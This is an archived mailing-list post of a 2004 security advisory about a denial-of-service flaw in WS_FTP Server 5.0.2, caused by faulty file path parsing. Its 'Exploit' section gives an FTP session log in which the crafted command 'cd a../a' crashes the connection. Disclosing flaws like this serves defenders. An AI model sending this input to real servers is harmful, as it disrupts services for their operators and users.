[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[vulnwatch] WS_FTP Server Denial of Service Vulnerability

To: "bugtraq" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: [vulnwatch] WS_FTP Server Denial of Service Vulnerability
From: "lion" <lion@xxxxxxxxxxxx>
Date: Mon, 30 Aug 2004 02:40:46 +0800

[vulnwatch] WS_FTP Server Denial of Service Vulnerability

www.cnhonker.com
Security Advisory

Advisory Name: WS_FTP Server Denial of Service Vulnerability
Release Date: 08/30/2004
Affected version: WS_FTP Server 5.0.2
Author: lion <lion@xxxxxxxxxxxx>

Overview: 

A vulnerability has been found in WS_FTP Server. The problem \
is in the module of file path parse will cause FTP server to \
consume large amounts of CPU power.

Exploit:

E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a 
Connection closed by remote host.

About HUC:

HUC is still alive.

Prev by Date: Re: Netscape Navigator 7.2 failure to isolate browser tabs (was Re: Computer Network Defence Vulnerability Alert State)
Next by Date: CuteNews News.txt writable to world
Previous by thread: Re: 0day critical vulnerability/exploit targets Winamp users in the wild
Next by thread: CuteNews News.txt writable to world
Index(es):
- Date
- Thread